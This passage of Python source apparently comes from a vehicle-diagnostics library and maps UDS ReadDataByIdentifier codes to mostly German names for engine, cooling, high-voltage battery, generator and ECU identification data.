"Kupplungsschalter" +UDS_RDBI.dataIdentifiers[0x3015] = "Crashsignal Ueber HW LTG Flag" +UDS_RDBI.dataIdentifiers[0x3016] = "Zuendung Klemme 15 Read Zuendung Klemme15" # or Zuendung Klemme15 P L Ignition switch, Zuendung Klemme15 PRES Nein Ja +UDS_RDBI.dataIdentifiers[0x3017] = "Motoroelfuellstandschalter" +UDS_RDBI.dataIdentifiers[0x3018] = "Kickdownschalter" +UDS_RDBI.dataIdentifiers[0x3019] = "EV Delay Timer" # or Klemme50 Starter, Kupplungsschalter oben (Ein, EV Delay Timer CpcSyncDelayTimer +UDS_RDBI.dataIdentifiers[0x301c] = "CEP Server URL" +UDS_RDBI.dataIdentifiers[0x301d] = "NTP URL Pool" +UDS_RDBI.dataIdentifiers[0x301e] = "RTMATPbaseURL" +UDS_RDBI.dataIdentifiers[0x3020] = "Waehlhebel Fahrstufe Motorfernstart" +UDS_RDBI.dataIdentifiers[0x3021] = "Waehlhebel Fahrstufe" +UDS_RDBI.dataIdentifiers[0x3022] = "Maintenance Management Weighting Factors divisor weighting factor" # or Tumbleklappenschalter 1 Spannung, Maintenance Management Weighting Factors +UDS_RDBI.dataIdentifiers[0x3023] = "Tumbleklappenschalter 2 Spannung" +UDS_RDBI.dataIdentifiers[0x3024] = "Schutzeinrichtung Motorhabenkontaktschalter" # or E Call Parameter AUTOMATIC KEYLOCK TIMER, E Call Parameter +UDS_RDBI.dataIdentifiers[0x3025] = "VIN Mapping" # or VIN Mapping Entry, Getriebetyp Automatik +UDS_RDBI.dataIdentifiers[0x3030] = "Abgasklappe Endstufe Spannung" +UDS_RDBI.dataIdentifiers[0x3031] = "Abgasklappe Winkelsensor Spannung" +UDS_RDBI.dataIdentifiers[0x3032] = "Klimaanlagen Schalter" # or Sensor Versorgungsspannung +UDS_RDBI.dataIdentifiers[0x3034] = "Tempomat" +UDS_RDBI.dataIdentifiers[0x3035] = "Tempomat Fehlerstatus" +UDS_RDBI.dataIdentifiers[0x3400] = "3401 3420" +UDS_RDBI.dataIdentifiers[0x3401] = "IUPR 3 voices catalyst dignostic Number of times the system enters in each diagnosis conditions" +UDS_RDBI.dataIdentifiers[0x3402] = "IUPR Oxygene sensor diagnostic Number of times the system enters in each diagnosis conditions" +UDS_RDBI.dataIdentifiers[0x3403] = "IUPR 3 voices catalyst dignostic Number of criteria calculated by resolution" +UDS_RDBI.dataIdentifiers[0x3404] = "IUPR Oxygene sensor diagnostic Number of criteria calculated by resolution" +UDS_RDBI.dataIdentifiers[0x3405] = "IUPR 3 voices catalyst dignostic Number of times the system quits each diagnosis conditions" +UDS_RDBI.dataIdentifiers[0x3406] = "IUPR Oxygene sensor diagnostic Number of times the system quits each diagnosis conditions" +UDS_RDBI.dataIdentifiers[0x3407] = "IUPR Number of driving cycle with 3 voices cata diagnosis aborted" +UDS_RDBI.dataIdentifiers[0x3408] = "IUPR Number of driving cycle with lbup diagnosis aborted" +UDS_RDBI.dataIdentifiers[0x3409] = "IUPR 3 voices catalyst dignostic Average of the maximum durations in diagnosis conditions without diagnosis done" +UDS_RDBI.dataIdentifiers[0x340a] = "IUPR Oxygene sensor diagnostic Average of the maximum durations in diagnosis conditions without diagnosis done" +UDS_RDBI.dataIdentifiers[0x340b] = "IUPR Number of times the system enters in each doc diagnosis conditions" +UDS_RDBI.dataIdentifiers[0x340c] = "IUPR Number of times the system enters in each pft diagnosis conditions" +UDS_RDBI.dataIdentifiers[0x340d] = "IUPR Number of criteria calculated by resolution for the doc diagnosis" +UDS_RDBI.dataIdentifiers[0x340e] = "IUPR Number of criteria calculated by resolution in area 1 for the pft diagnosis" +UDS_RDBI.dataIdentifiers[0x340f] = "IUPR Number of criteria calculated by resolution in area 2 for the pft diagnosis" +UDS_RDBI.dataIdentifiers[0x3410] = "IUPR Number of criteria calculated by resolution in area 3 for the pft diagnosis" +UDS_RDBI.dataIdentifiers[0x3411] = "IUPR Number of criteria calculated by resolution in area 4 for the pft diagnosis" +UDS_RDBI.dataIdentifiers[0x3412] = "IUPR Number of times the system quits each doc diagnosis conditions" +UDS_RDBI.dataIdentifiers[0x3413] = "IUPR Number of times the system quits each pft diagnosis conditions" +UDS_RDBI.dataIdentifiers[0x3414] = "IUPR 1st part of table of diagnosis EGR enabling condtions" +UDS_RDBI.dataIdentifiers[0x3415] = "IUPR 2nd part of table of diagnosis EGR enabling condtions" +UDS_RDBI.dataIdentifiers[0x3416] = "IUPR 3rd part of table of diagnosis EGR enabling condtions" +UDS_RDBI.dataIdentifiers[0x3417] = "IUPR 4th part of table of diagnosis EGR enabling condtions" +UDS_RDBI.dataIdentifiers[0x3418] = "IUPR 5th part of table of diagnosis EGR enabling condtions" +UDS_RDBI.dataIdentifiers[0x3419] = "IUPR 6th part of table of diagnosis EGR enabling condtions" +UDS_RDBI.dataIdentifiers[0x341a] = "IUPR 1st part of table of diagnosis EGR disabling condtions" +UDS_RDBI.dataIdentifiers[0x341b] = "IUPR 2nd part of table of diagnosis EGR disabling condtions" +UDS_RDBI.dataIdentifiers[0x341c] = "IUPR 3rd part of table of diagnosis EGR disabling condtions" +UDS_RDBI.dataIdentifiers[0x341d] = "IUPR 4th part of table of diagnosis EGR disabling condtions" +UDS_RDBI.dataIdentifiers[0x3420] = "3421 3440" +UDS_RDBI.dataIdentifiers[0x3421] = "2 last element of operating point when a misfire occurs for OBD Recorder" +UDS_RDBI.dataIdentifiers[0x3424] = "1st part of Number of criteria calculated by resolution for mass soot integer pft diagnosis" +UDS_RDBI.dataIdentifiers[0x3425] = "2nd part of Number of criteria calculated by resolution for mass soot integer pft diagnosis" +UDS_RDBI.dataIdentifiers[0x3426] = "3rd part of Number of criteria calculated by resolution for mass soot integer pft diagnosis" +UDS_RDBI.dataIdentifiers[0x3427] = "4th part of Number of criteria calculated by resolution for mass soot integer pft diagnosis" +UDS_RDBI.dataIdentifiers[0x3428] = "5th part of Number of criteria calculated by resolution for mass soot integer pft diagnosis" +UDS_RDBI.dataIdentifiers[0x3429] = "6th part of Number of criteria calculated by resolution for mass soot integer pft diagnosis" +UDS_RDBI.dataIdentifiers[0x342a] = "7th part of Number of criteria calculated by resolution for mass soot integer pft diagnosis" +UDS_RDBI.dataIdentifiers[0x342b] = "IUPR 5th part of table of diagnosis EGR disabling condtions" +UDS_RDBI.dataIdentifiers[0x342c] = "IUPR 6th part of table of diagnosis EGR disabling condtions" +UDS_RDBI.dataIdentifiers[0x342d] = "Total vehicle distance at the last oil drain" +UDS_RDBI.dataIdentifiers[0x342e] = "Number of engine revolutions since the last oil drain" +UDS_RDBI.dataIdentifiers[0x342f] = "Vehicle kilometer when the alert appears" +UDS_RDBI.dataIdentifiers[0x3430] = "Total vehicle distance stored at the last pre alert" +UDS_RDBI.dataIdentifiers[0x3431] = "4th part of the table for rear O2 sensor heater efficiency diagnosis criteria distribution for OBD recorder" +UDS_RDBI.dataIdentifiers[0x3432] = "1st part of the table for upstream O2 sensor heater efficiency diagnosis criteria distribution for OBD recorder" +UDS_RDBI.dataIdentifiers[0x3433] = "2nd part of the table for upstream O2 sensor heater efficiency diagnosis criteria distribution for OBD recorder" +UDS_RDBI.dataIdentifiers[0x3434] = "3rd part of the table for upstream O2 sensor heater efficiency diagnosis criteria distribution for OBD recorder" +UDS_RDBI.dataIdentifiers[0x3435] = "4th part of the table for upstream O2 sensor heater efficiency diagnosis criteria distribution for OBD recorder" +UDS_RDBI.dataIdentifiers[0x3436] = "IUPR Oxydation Catalyst diagnostic Average of the highest durations in diagnosis conditions without diagnosis done Re" +UDS_RDBI.dataIdentifiers[0x3440] = "3441 3460" +UDS_RDBI.dataIdentifiers[0x3441] = "1st and 2nd part of table of diagnosis boost pressure enabling condtions" +UDS_RDBI.dataIdentifiers[0x3442] = "3rd and 4th part of table of diagnosis boost pressure enabling condtions" +UDS_RDBI.dataIdentifiers[0x3443] = "table of diagnosis EGR criteria" +UDS_RDBI.dataIdentifiers[0x3444] = "1st part table of diagnosis boost pressure criteria condtions" +UDS_RDBI.dataIdentifiers[0x3445] = "2nd part of table of diagnosis boost pressure criteria condtions" +UDS_RDBI.dataIdentifiers[0x3446] = "3rd part of table of diagnosis boost pressure criteria condtions" +UDS_RDBI.dataIdentifiers[0x3447] = "4th part of table of diagnosis boost pressure criteria condtions" +UDS_RDBI.dataIdentifiers[0x344a] = "2 first bytes of the cumulative number of engine starts" +UDS_RDBI.dataIdentifiers[0x344b] = "2 first bytes of the number of engine first starts or number of trips done by the vehicle" +UDS_RDBI.dataIdentifiers[0x344c] = "2 first bytes of the cumulative number of engine starts non resettable" +UDS_RDBI.dataIdentifiers[0x344d] = "2 first bytes of the number of engine first starts or number of trips done by the vehicle non resettable" +UDS_RDBI.dataIdentifiers[0x3456] = "3rd byte of the cumulative number of engine starts" +UDS_RDBI.dataIdentifiers[0x3457] = "3rd byte of the number of engine first starts or number of trips done by the vehicle" +UDS_RDBI.dataIdentifiers[0x3458] = "3rd byte of the cumulative number of engine starts non resettable" +UDS_RDBI.dataIdentifiers[0x3459] = "3rd byte of the number of engine first starts or number of trips done by the vehicle non resettable" +UDS_RDBI.dataIdentifiers[0x345a] = "3rd byte of the number of engine first starts or number of trips done by the vehicle non resettable" +UDS_RDBI.dataIdentifiers[0x345e] = "Ratio IUPR classe pool" +UDS_RDBI.dataIdentifiers[0x345f] = "Numerateur et denominateur des IUPR pour les classes private" +UDS_RDBI.dataIdentifiers[0x3b01] = "open cable detection test result" +UDS_RDBI.dataIdentifiers[0x3b02] = "open cable detection circuit check result" +UDS_RDBI.dataIdentifiers[0x3b03] = "Disabler for isolation detection" +UDS_RDBI.dataIdentifiers[0x3b04] = "Disabler for open cable detection" +UDS_RDBI.dataIdentifiers[0x3b05] = "Disabler for weld check and active discharge functionality" +UDS_RDBI.dataIdentifiers[0x3b06] = "Disabler for open cable detection circuit check" +UDS_RDBI.dataIdentifiers[0x3b07] = "Disabler for contactor closure after failed weld check" +UDS_RDBI.dataIdentifiers[0x3f00] = "Reset Zaehler Batteriefehler Reset Zaehler" # or WD Reset Counter Read Watchdog Reset Zaehler +UDS_RDBI.dataIdentifiers[0x3f01] = "WD Reset Counter Reset" +UDS_RDBI.dataIdentifiers[0x3f02] = "FBS mobil Tuergriff Lieferant" +UDS_RDBI.dataIdentifiers[0x3f03] = "Service Call Settings" +UDS_RDBI.dataIdentifiers[0x3f04] = "E Call Settings" +UDS_RDBI.dataIdentifiers[0x3f05] = "ERA Test Mode Numbers" +UDS_RDBI.dataIdentifiers[0x3f06] = "ERA 54620 Appendix A Parameter" +UDS_RDBI.dataIdentifiers[0x3f07] = "RTM settings" +UDS_RDBI.dataIdentifiers[0x3f08] = "Fastpath settings" +UDS_RDBI.dataIdentifiers[0x3f09] = "FastpathTopicTree" +UDS_RDBI.dataIdentifiers[0x3f12] = "High Voltage Battery Charge" +UDS_RDBI.dataIdentifiers[0x3f15] = "Impact Event" +UDS_RDBI.dataIdentifiers[0x3f17] = "Regenerative Braking" +UDS_RDBI.dataIdentifiers[0x3f18] = "System State" +UDS_RDBI.dataIdentifiers[0x3f20] = "Start-Stop Enable" +UDS_RDBI.dataIdentifiers[0x3f21] = "Jump Assist State" +UDS_RDBI.dataIdentifiers[0x3f22] = "Transmission Range Transistion State" +UDS_RDBI.dataIdentifiers[0x3f23] = "X/Y Valves Current State" +UDS_RDBI.dataIdentifiers[0x3f24] = "X/Y Valves Commanded State" +UDS_RDBI.dataIdentifiers[0x3f25] = "X/Y Valves Transition State" +UDS_RDBI.dataIdentifiers[0x3f26] = "Estimated Line Pressure" +UDS_RDBI.dataIdentifiers[0x3f27] = "Motor A Inverter" +UDS_RDBI.dataIdentifiers[0x3f28] = "Motor B Inverter" +UDS_RDBI.dataIdentifiers[0x3f29] = "Vehicle total distance" +UDS_RDBI.dataIdentifiers[0x3f30] = "BMW Car Group Active Diagnostic Information" +UDS_RDBI.dataIdentifiers[0x3f32] = "BMW Car Group Reprogramming Attempt Counter" +UDS_RDBI.dataIdentifiers[0x3f34] = "BMW Car Group Read Fingerprint" +UDS_RDBI.dataIdentifiers[0x3f36] = "BMW Car Group Hardware Version Information" +UDS_RDBI.dataIdentifiers[0x3f38] = "BMW Car Group Software Version Information" +UDS_RDBI.dataIdentifiers[0x3f3a] = "BMW Car Group Boot Software Version Information" +UDS_RDBI.dataIdentifiers[0x3f3c] = "BMW Car Group Hardware Supplier Identification" +UDS_RDBI.dataIdentifiers[0x3f3e] = "BMW Car Group Software Supplier Identification" +UDS_RDBI.dataIdentifiers[0x3f41] = "BMW Car Group Hardware Part Number" +UDS_RDBI.dataIdentifiers[0x3f51] = "BMW Car Group Software Part Number" +UDS_RDBI.dataIdentifiers[0x3f61] = "BMW Car Group ECU Assembly Number" +UDS_RDBI.dataIdentifiers[0x3f80] = "BMW Car Group Assembly Number" +UDS_RDBI.dataIdentifiers[0x3f90] = "ZIF Lesen" +UDS_RDBI.dataIdentifiers[0x4000] = "Kraftstoffpumpenspannung" +UDS_RDBI.dataIdentifiers[0x4001] = "Full Diagnostic Availability Check" # or Jump Assist added Charge +UDS_RDBI.dataIdentifiers[0x4002] = "HV Current Channel A" # or RDiag Transmission Statistics Day, Drosselklappe Poti1 +UDS_RDBI.dataIdentifiers[0x4003] = "HV Current Channel B " # or Drosselklappe Poti2 +UDS_RDBI.dataIdentifiers[0x4004] = "MCPB Motor A Active Control State" # or MCPA Motor B Active Control Stat" # or Kraftstoffpumpenphasenstrom +UDS_RDBI.dataIdentifiers[0x4005] = "Operation" +UDS_RDBI.dataIdentifiers[0x4006] = "PCB Temperature" # or RDiag RDA Initial Summary Block Datablock, Drosselklappe Lernvorgang Beendet +UDS_RDBI.dataIdentifiers[0x4007] = "Hood State" # or Drosselklappe Erfolgreich Gelernt, RDiag oVCI ECU List incl dynamic content HexDump ECUList including dynamic content +UDS_RDBI.dataIdentifiers[0x4008] = "LV Bus Current" +UDS_RDBI.dataIdentifiers[0x4009] = "Nockenwellenadaption Einlass" # or EMPI +UDS_RDBI.dataIdentifiers[0x400a] = "Inhibit Input-Output History" +UDS_RDBI.dataIdentifiers[0x400b] = "EMPI Speed Commanded" +UDS_RDBI.dataIdentifiers[0x400c] = "EMPI Speed Actual" +UDS_RDBI.dataIdentifiers[0x400d] = "Time since Propulsion System Active" +UDS_RDBI.dataIdentifiers[0x400e] = "Sensed Engine Torque" +UDS_RDBI.dataIdentifiers[0x400f] = "Achieved DSM Position" +UDS_RDBI.dataIdentifiers[0x4010] = "Abgasklappen" # or Park Verification Switch +UDS_RDBI.dataIdentifiers[0x4011] = "Luefternachlauf angefordert" # or Transmission PRND Range +UDS_RDBI.dataIdentifiers[0x4012] = "Nachlauf Anforderung AGK" # or HV Fuse, Nockenwellenwinkel Einlass +UDS_RDBI.dataIdentifiers[0x4013] = "Luefter PWM Fehlerstatus" # or HV Fuse Information +UDS_RDBI.dataIdentifiers[0x4014] = "Aktuelles Ist-Tastverhaeltnis Tankentlueftungsventil" # or Bugschuerzenjalouse LIN Sollwert, Tankentlueftung Aktuelles Tastverhaeltnis +UDS_RDBI.dataIdentifiers[0x4015] = "Bugschuerzenjalouse LIN Referenzfahrt" # or Drosselklappe Poti1 Unterer Anschlag, Spannung DK-Poti 1 am unteren Anschlag +UDS_RDBI.dataIdentifiers[0x4016] = "Bugschuerzenjalouse LIN Fehlerstatus" # or Spannung DK-Poti 2 am unteren Anschlag, Drosselklappe Poti2 Unterer Anschlag +UDS_RDBI.dataIdentifiers[0x4017] = "Drosselklappe Winkel Notluftposition" # or DK-Winkel der Notluftposition, Kuehlaggregat Chillerventil CO2 Initialisierungsstatus +UDS_RDBI.dataIdentifiers[0x4018] = "Drosselklappe Verstaerkung1" +UDS_RDBI.dataIdentifiers[0x4019] = "Drosselklappe Verstaerkung1 Spannungsoffset" +UDS_RDBI.dataIdentifiers[0x401b] = "Drosselklappe Referenzablage erfolgreich" +UDS_RDBI.dataIdentifiers[0x4020] = "Kuehlmittel Drehschieberventil LIN Sollwert" +UDS_RDBI.dataIdentifiers[0x4021] = "Verstaerkte Spannung DK-Poti" # or Kuehlmittel Drehschieberventil BMS Sollwert, Drosselklappe Poti1 verstaerkt +UDS_RDBI.dataIdentifiers[0x4022] = "Chiller Sollwert" +UDS_RDBI.dataIdentifiers[0x4023] = "Kaeltemittelkreislauf HV Batterie Ventil Sollwert" +UDS_RDBI.dataIdentifiers[0x4024] = "Kaeltemittelkreislauf Chiller Sollwert" +UDS_RDBI.dataIdentifiers[0x4025] = "Wasserpumpe LIN Sollwert" +UDS_RDBI.dataIdentifiers[0x4026] = "Kuehlmittelpumpe Ladeluft Sollwert" +UDS_RDBI.dataIdentifiers[0x4027] = "Kuehlmittelpumpe BMS Sollwert" +UDS_RDBI.dataIdentifiers[0x4028] = "Kuehlerjalousie LIN Referenzfahrt Fehler" +UDS_RDBI.dataIdentifiers[0x4033] = "Drosselklappe Winkel Bezogen auf Unteren Anschlag" # or DK-Winkel unterer Anschlag +UDS_RDBI.dataIdentifiers[0x4040] = "SG intern gemessener Ausgangsstrom zur DMTL Pumpe" # or DMTL Pumpenstrom +UDS_RDBI.dataIdentifiers[0x4041] = "Motordrehzahlbegrenzung Aktiv" # or Motordrehzahlbegrenzung ist aktiv +UDS_RDBI.dataIdentifiers[0x4042] = "Fuelrailentlueftungsfunktion Freigabe Laueft" +UDS_RDBI.dataIdentifiers[0x4046] = "Fuelrailentlueftungsfunktion NachStart" +UDS_RDBI.dataIdentifiers[0x4060] = "Nockenwellenreferenzadaption Zustand Einlass" +UDS_RDBI.dataIdentifiers[0x4061] = "Nockenwellenreferenzadaption Zustand Auslass" +UDS_RDBI.dataIdentifiers[0x4062] = "Nockenwellenreferenzadaption Zustand Einlass Links" +UDS_RDBI.dataIdentifiers[0x4063] = "Nockenwellenreferenzadaption Zustand Auslass Links" +UDS_RDBI.dataIdentifiers[0x4064] = "Nockenwellenreferenzadaption Winkeldifferenz Einlass" +UDS_RDBI.dataIdentifiers[0x4065] = "Nockenwellenreferenzadaption Winkeldifferenz Auslass" +UDS_RDBI.dataIdentifiers[0x4066] = "Nockenwellenreferenzadaption Winkeldifferenz Einlass Links" +UDS_RDBI.dataIdentifiers[0x4067] = "Nockenwellenreferenzadaption Winkeldifferenz Auslass Links" +UDS_RDBI.dataIdentifiers[0x4070] = "Niedertemperatur Pumpenlaufzeit" +UDS_RDBI.dataIdentifiers[0x4086] = "Wastegate Position ROH" +UDS_RDBI.dataIdentifiers[0x4087] = "Wastegate Position" +UDS_RDBI.dataIdentifiers[0x4088] = "Wastegate Adaption laeuft" +UDS_RDBI.dataIdentifiers[0x408a] = "Wastegate Adaption Ergebnis" +UDS_RDBI.dataIdentifiers[0x408b] = "Wastegate Adaption Abbruch" +UDS_RDBI.dataIdentifiers[0x40d0] = "DC Voltage Sensor" +UDS_RDBI.dataIdentifiers[0x40d2] = "Sensor" +UDS_RDBI.dataIdentifiers[0x40d6] = "Sensor Voltage" +UDS_RDBI.dataIdentifiers[0x40d7] = "Module Temp Sensor" +UDS_RDBI.dataIdentifiers[0x40d8] = "Module Temp Sensor 1 Voltage" +UDS_RDBI.dataIdentifiers[0x40d9] = "Module Temp Sensor" +UDS_RDBI.dataIdentifiers[0x40da] = "Module Temp Sensor 2 Voltage" +UDS_RDBI.dataIdentifiers[0x40db] = "Module Temp Sensor" +UDS_RDBI.dataIdentifiers[0x40dc] = "Module Temp Sensor 3 Voltage" +UDS_RDBI.dataIdentifiers[0x40dd] = "Module Temp Sensor 4" +UDS_RDBI.dataIdentifiers[0x40de] = "Module Temp Sensor 4 Voltage" +UDS_RDBI.dataIdentifiers[0x40e4] = "Module 1 Voltage Sensor" +UDS_RDBI.dataIdentifiers[0x40e5] = "Module 2 Voltage Sensor" +UDS_RDBI.dataIdentifiers[0x40e6] = "Module 3 Voltage Sensor" +UDS_RDBI.dataIdentifiers[0x40e7] = "Fan Speed" +UDS_RDBI.dataIdentifiers[0x40e8] = "Fan Commanded PWM" +UDS_RDBI.dataIdentifiers[0x40e9] = "High Voltage Battery Resistance" +UDS_RDBI.dataIdentifiers[0x40eb] = "Maximum Module Voltage" +UDS_RDBI.dataIdentifiers[0x40ec] = "Minimum Module Voltage" +UDS_RDBI.dataIdentifiers[0x40ee] = "DisCharge Power Available Short Term" +UDS_RDBI.dataIdentifiers[0x40ef] = "Charge Power Available Short Term" +UDS_RDBI.dataIdentifiers[0x40f0] = "Module 7 Voltage Sensor" +UDS_RDBI.dataIdentifiers[0x40f1] = "Module 8 Voltage Sensor" +UDS_RDBI.dataIdentifiers[0x40f2] = "Module 9 Voltage Sensor" +UDS_RDBI.dataIdentifiers[0x40f3] = "Module 10 Voltage Sensor" +UDS_RDBI.dataIdentifiers[0x40f4] = "Module 11Voltage Sensor" +UDS_RDBI.dataIdentifiers[0x40f5] = "Module 12 Voltage Sensor" +UDS_RDBI.dataIdentifiers[0x40f6] = "Module 13 Voltage Sensor" +UDS_RDBI.dataIdentifiers[0x40f7] = "Module 14 Voltage Sensor" +UDS_RDBI.dataIdentifiers[0x40f8] = "Module 15 Voltage Sensor" +UDS_RDBI.dataIdentifiers[0x40f9] = "Module 16 Voltage Sensor" +UDS_RDBI.dataIdentifiers[0x40fa] = "Module 17 Voltage Sensor" +UDS_RDBI.dataIdentifiers[0x40fb] = "Module 18 Voltage Sensor" +UDS_RDBI.dataIdentifiers[0x40fc] = "Module 19 Voltage Sensor" +UDS_RDBI.dataIdentifiers[0x40fd] = "Module 20 Voltage Sensor" +UDS_RDBI.dataIdentifiers[0x40fe] = "Voltage Calculated" +UDS_RDBI.dataIdentifiers[0x40ff] = "AC Isolation Resistance" +UDS_RDBI.dataIdentifiers[0x4100] = "HVIL Source Current" +UDS_RDBI.dataIdentifiers[0x4101] = "HVIL Return Current" +UDS_RDBI.dataIdentifiers[0x4102] = "Contactor Stat" +UDS_RDBI.dataIdentifiers[0x4103] = "Contactor Open" +UDS_RDBI.dataIdentifiers[0x4104] = "Contactor Weld Check Stat" +UDS_RDBI.dataIdentifiers[0x4105] = "battery Contactor Commanded PWM " +UDS_RDBI.dataIdentifiers[0x4106] = "High Battery Contactor Command Stat" +UDS_RDBI.dataIdentifiers[0x4107] = "Inlet Air Temp Sensor" +UDS_RDBI.dataIdentifiers[0x4108] = "Inlet Air Temp Sensor Voltage" +UDS_RDBI.dataIdentifiers[0x4109] = "Outlet Air Temp Sensor" +UDS_RDBI.dataIdentifiers[0x410a] = "Outlet Air Temp Sensor Voltage" +UDS_RDBI.dataIdentifiers[0x410b] = "Module 4 Voltage Sensor" +UDS_RDBI.dataIdentifiers[0x410c] = "Module 5 Voltage Sensor" +UDS_RDBI.dataIdentifiers[0x410d] = "Module 6 Voltage Sensor" +UDS_RDBI.dataIdentifiers[0x4110] = "BPCM Observed Positive Rail Welded Contactor" +UDS_RDBI.dataIdentifiers[0x4111] = "BPCM Observed Negative Rail Welded Contactor" +UDS_RDBI.dataIdentifiers[0x4112] = "BPCM Observed Both Rails Welded Contactor" +UDS_RDBI.dataIdentifiers[0x4113] = "Benzin Betrieb Verbot wegen Crash" +UDS_RDBI.dataIdentifiers[0x4114] = "Bremskreis Unterdruckpumpe Betriebszeit" +UDS_RDBI.dataIdentifiers[0x4115] = "Bremskreis Unterdruckpumpe Anzahl Aktivierung" # or Isolation measurement with closed contactors and positive rail +UDS_RDBI.dataIdentifiers[0x4116] = "Isolation measurement with closed contactors and negative rail" +UDS_RDBI.dataIdentifiers[0x4117] = "Isolation measurement combined with open contactors " +UDS_RDBI.dataIdentifiers[0x4118] = "Isolation test fully performed" +UDS_RDBI.dataIdentifiers[0x4149] = "HV Isolation" +UDS_RDBI.dataIdentifiers[0x41ee] = "DisCharge Power Available Long Term" +UDS_RDBI.dataIdentifiers[0x41ef] = "Charge Power Available Long Term" +UDS_RDBI.dataIdentifiers[0x4200] = "Kuehlerjalousie LIN Sollwert" +UDS_RDBI.dataIdentifiers[0x4201] = "Kuehlerjalousie LIN Referenzfahrt" +UDS_RDBI.dataIdentifiers[0x4202] = "Kuehlerjalousie LIN Fehlerstatus" +UDS_RDBI.dataIdentifiers[0x4203] = "Kuehlmittel Drehschieberventil LIN Sollwert" +UDS_RDBI.dataIdentifiers[0x4204] = "Kuehlmittel Drehschieberventil LIN Referenzfahrt" +UDS_RDBI.dataIdentifiers[0x4205] = "Kuehlmittel Drehschieberventil LIN Referenzfahrt Fehler" +UDS_RDBI.dataIdentifiers[0x4206] = "Kuehlmittel Drehschieberventil LIN Fehlerstatus" +UDS_RDBI.dataIdentifiers[0x4207] = "Kuehlmittel Drehschieberventil BMS LIN Sollwert" +UDS_RDBI.dataIdentifiers[0x4208] = "Kuehlmittel Drehschieberventil BMS LIN Referenzfahrt" +UDS_RDBI.dataIdentifiers[0x4209] = "Kuehlmittel Drehschieberventil BMS LIN Referenzfahrt Fehler" +UDS_RDBI.dataIdentifiers[0x420a] = "Kuehlmittel Drehschieberventil BMS LIN Fehlerstatus" +UDS_RDBI.dataIdentifiers[0x4210] = "Kuehlermaskenjalousie LIN Sollwert" +UDS_RDBI.dataIdentifiers[0x4211] = "Kuehlermaskenjalousie LIN Referenzfahrt" +UDS_RDBI.dataIdentifiers[0x4212] = "Kuehlermaskenjalousie LIN Fehlerstatus" +UDS_RDBI.dataIdentifiers[0x4213] = "Kuehlmittelpumpe Getriebeoel Sollwert Read Kuehlmittelpumpe Getriebeoel Sollwert" +UDS_RDBI.dataIdentifiers[0x4214] = "Kuehlmittelpumpe Plugin Hybrid Sollwert" +UDS_RDBI.dataIdentifiers[0x4215] = "Kuehlaggregat Expansionsventil Sollwert" +UDS_RDBI.dataIdentifiers[0x4216] = "Kuehlmittelpumpe NT2 15W BMS Sollwert" +UDS_RDBI.dataIdentifiers[0x4217] = "PTC Zuheizer Plugin Hybrid Sollwert" +UDS_RDBI.dataIdentifiers[0x4800] = "Exhaust flap control state EGFC State" # or Exhaust gas flap State +UDS_RDBI.dataIdentifiers[0x4f01] = "RDiag oVCI Firewall Black List" +UDS_RDBI.dataIdentifiers[0x4f02] = "RDiag oVCI Configuration" +UDS_RDBI.dataIdentifiers[0x4f03] = "RDiag oVCI Default CommParam" +UDS_RDBI.dataIdentifiers[0x4f04] = "RDiag oVCI ECU List" +UDS_RDBI.dataIdentifiers[0x4f05] = "RDiag oVCI Firewall White List" +UDS_RDBI.dataIdentifiers[0x4f06] = "RDiag RDA Configuration" +UDS_RDBI.dataIdentifiers[0x4f07] = "RDiag RDA Trigger Configuration LogicalBlock 2" +UDS_RDBI.dataIdentifiers[0x4f08] = "RDiag RDA Trigger Configuration LogicalBlock 3" +UDS_RDBI.dataIdentifiers[0x4f09] = "RDiag RDA Trigger Configuration LogicalBlock 4" +UDS_RDBI.dataIdentifiers[0x4f0a] = "RDiag RDA Trigger Configuration LogicalBlock 5" +UDS_RDBI.dataIdentifiers[0x4f0b] = "RDiag RDA Trigger Configuration LogicalBlock 6" +UDS_RDBI.dataIdentifiers[0x4f0c] = "RDiag RDA Trigger Configuration LogicalBlock 7" +UDS_RDBI.dataIdentifiers[0x4f0d] = "RDiag RDA Trigger Configuration LogicalBlock 8" +UDS_RDBI.dataIdentifiers[0x4f0e] = "RDiag RDA Trigger Configuration LogicalBlock 9" +UDS_RDBI.dataIdentifiers[0x4f0f] = "RDiag RDA Trigger Configuration LogicalBlock 10" +UDS_RDBI.dataIdentifiers[0x4f10] = "RDiag RDA Trigger Configuration LogicalBlock 11" +UDS_RDBI.dataIdentifiers[0x5000] = "Generatorkennung" # or Motordrehzahl Read Response Parameters Motordrehzahl +UDS_RDBI.dataIdentifiers[0x5001] = "Eingestellter Erregerstrom" +UDS_RDBI.dataIdentifiers[0x5002] = "Auslastungsgrad" # or Motordrehzahl gefiltert +UDS_RDBI.dataIdentifiers[0x5003] = "Generator Funktionsfehler Detail Vorgemerkt" +UDS_RDBI.dataIdentifiers[0x5004] = "Messwert berechnetes Generatormoment Generator" +UDS_RDBI.dataIdentifiers[0x5005] = "Berechneter Generatorstrom" +UDS_RDBI.dataIdentifiers[0x5006] = "Generatorfehler Kommunikationsfehler" +UDS_RDBI.dataIdentifiers[0x5007] = "Generatorfehler elektrisch" +UDS_RDBI.dataIdentifiers[0x5008] = "Generatorfehler mechanisch" +UDS_RDBI.dataIdentifiers[0x5009] = "Generatorfehler Timeout" +UDS_RDBI.dataIdentifiers[0x5010] = "Klemme 15 CAN" # or Klemme 15 CAN Read Klemme 15 CAN, Aussenlufttemperatur ROH +UDS_RDBI.dataIdentifiers[0x5011] = "Generator Funktionsfehler Vorgemerkt Max Dauer" +UDS_RDBI.dataIdentifiers[0x5012] = "Schubbetrieb" +UDS_RDBI.dataIdentifiers[0x5013] = "Stoppmode" +UDS_RDBI.dataIdentifiers[0x5014] = "Gasbetrieb" +UDS_RDBI.dataIdentifiers[0x5015] = "Generator Kommunikationsfehler Vorgemerkt Max Dauer" +UDS_RDBI.dataIdentifiers[0x5016] = "Volumenstrom Vorgabe CAN" # or Generator Kommunikationsfehler Detail Vorgemerkt +UDS_RDBI.dataIdentifiers[0x5017] = "Generator Kommunikationsfehler Vorgemerkt" +UDS_RDBI.dataIdentifiers[0x5018] = "Generatorfehler Hochtemperatur von aktivem Generator" +UDS_RDBI.dataIdentifiers[0x501a] = "Generatorvorgaben Information" +UDS_RDBI.dataIdentifiers[0x501b] = "Generatorvorgaben Information" +UDS_RDBI.dataIdentifiers[0x501c] = "Generatorfehler Umgebungsdaten Information" +UDS_RDBI.dataIdentifiers[0x501d] = "Generatorfehler Umgebungsdaten Information" +UDS_RDBI.dataIdentifiers[0x5020] = "Fahrstufe" # or aktuelle(r) Gang / Fahrstufe, Zuendung Klemme15 CAN 